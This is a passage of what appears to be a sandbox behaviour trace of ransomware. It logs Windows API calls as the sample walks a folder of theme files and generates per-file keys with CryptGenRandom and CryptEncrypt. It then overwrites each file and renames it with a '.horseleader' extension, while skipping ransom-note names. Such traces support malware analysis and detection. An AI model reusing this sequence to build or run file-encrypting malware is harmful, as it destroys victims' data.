sVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.066] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.067] CloseHandle (hObject=0x158) returned 1 [0248.067] GetProcessHeap () returned 0x780000 [0248.067] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.067] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="STRTEDGE", cAlternateFileName="")) returned 1 [0248.067] lstrcmpiW (lpString1="STRTEDGE", lpString2="Windows") returned -1 [0248.067] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE") returned 68 [0248.067] lstrcmpW (lpString1="STRTEDGE", lpString2=".") returned 1 [0248.067] lstrcmpW (lpString1="STRTEDGE", lpString2="..") returned 1 [0248.067] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.067] GetProcessHeap () returned 0x780000 [0248.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.067] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*") returned 70 [0248.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.069] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\.") returned 70 [0248.069] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.069] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5abe1b90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3f0bd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.069] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\..") returned 71 [0248.069] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.069] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.069] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6c9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.069] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.069] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0248.069] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.069] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.069] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.069] lstrlenW (lpString=".testttjffg") returned 11 [0248.070] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.070] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.070] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.070] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 80 [0248.071] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.071] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1737) returned 1 [0248.071] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x6c9, lpOverlapped=0x0) returned 1 [0248.073] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff937, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x6c9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x6c9, lpOverlapped=0x0) returned 1 [0248.073] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.073] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.074] CloseHandle (hObject=0x1a4) returned 1 [0248.074] GetProcessHeap () returned 0x780000 [0248.074] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.074] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.horseleader") returned 92 [0248.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.horseleader")) returned 1 [0248.075] GetProcessHeap () returned 0x780000 [0248.075] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.075] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d180d00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5abe1b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2d180d00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe232, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STRTEDGE.ELM", cAlternateFileName="")) returned 1 [0248.075] lstrcmpiW (lpString1="STRTEDGE.ELM", lpString2="Windows") returned -1 [0248.075] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0248.076] StrStrIW (lpFirst="STRTEDGE.ELM", lpSrch=".horseleader") returned 0x0 [0248.076] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.076] lstrcmpW (lpString1="STRTEDGE.ELM", lpString2="_uninstalling_.png") returned 1 [0248.076] lstrlenW (lpString=".testttjffg") returned 11 [0248.076] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM", lpSrch=".testttjffg") returned 0x0 [0248.076] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.076] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0248.077] StrStrW (lpFirst="STRTEDGE.ELM", lpSrch=".txt") returned 0x0 [0248.077] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=57906) returned 1 [0248.077] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.080] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.081] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.081] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.082] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.082] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4232, lpOverlapped=0x0) returned 1 [0248.082] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbdce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.082] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4232, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4232, lpOverlapped=0x0) returned 1 [0248.083] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.083] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.083] CloseHandle (hObject=0x1a4) returned 1 [0248.083] GetProcessHeap () returned 0x780000 [0248.083] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.083] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.horseleader") returned 93 [0248.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm.horseleader")) returned 1 [0248.087] GetProcessHeap () returned 0x780000 [0248.087] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.087] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d3f0bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x271, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STRTEDGE.INF", cAlternateFileName="")) returned 1 [0248.087] lstrcmpiW (lpString1="STRTEDGE.INF", lpString2="Windows") returned -1 [0248.087] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0248.087] StrStrIW (lpFirst="STRTEDGE.INF", lpSrch=".horseleader") returned 0x0 [0248.088] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="#Decrypt#.txt") returned 1 [0248.088] lstrcmpW (lpString1="STRTEDGE.INF", lpString2="_uninstalling_.png") returned 1 [0248.088] lstrlenW (lpString=".testttjffg") returned 11 [0248.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF", lpSrch=".testttjffg") returned 0x0 [0248.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.089] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF") returned 81 [0248.089] StrStrW (lpFirst="STRTEDGE.INF", lpSrch=".txt") returned 0x0 [0248.090] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=625) returned 1 [0248.090] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x271, lpOverlapped=0x0) returned 1 [0248.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffd8f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x271, lpOverlapped=0x0) returned 1 [0248.091] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.091] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.092] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.092] CloseHandle (hObject=0x1a4) returned 1 [0248.092] GetProcessHeap () returned 0x780000 [0248.092] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.092] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF.horseleader") returned 93 [0248.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.inf.horseleader")) returned 1 [0248.093] GetProcessHeap () returned 0x780000 [0248.093] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.093] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x82c7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.093] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.094] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0248.094] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.094] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.094] lstrlenW (lpString=".testttjffg") returned 11 [0248.094] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.094] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.094] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.095] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 81 [0248.095] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.095] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33479) returned 1 [0248.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.099] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.099] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.099] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x32c7, lpOverlapped=0x0) returned 1 [0248.100] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcd39, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x32c7, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x32c7, lpOverlapped=0x0) returned 1 [0248.100] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.100] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.100] CloseHandle (hObject=0x1a4) returned 1 [0248.101] GetProcessHeap () returned 0x780000 [0248.101] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.101] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.horseleader") returned 93 [0248.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.horseleader")) returned 1 [0248.102] GetProcessHeap () returned 0x780000 [0248.102] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.102] FindNextFileW (in: hFindFile=0x7c6760, 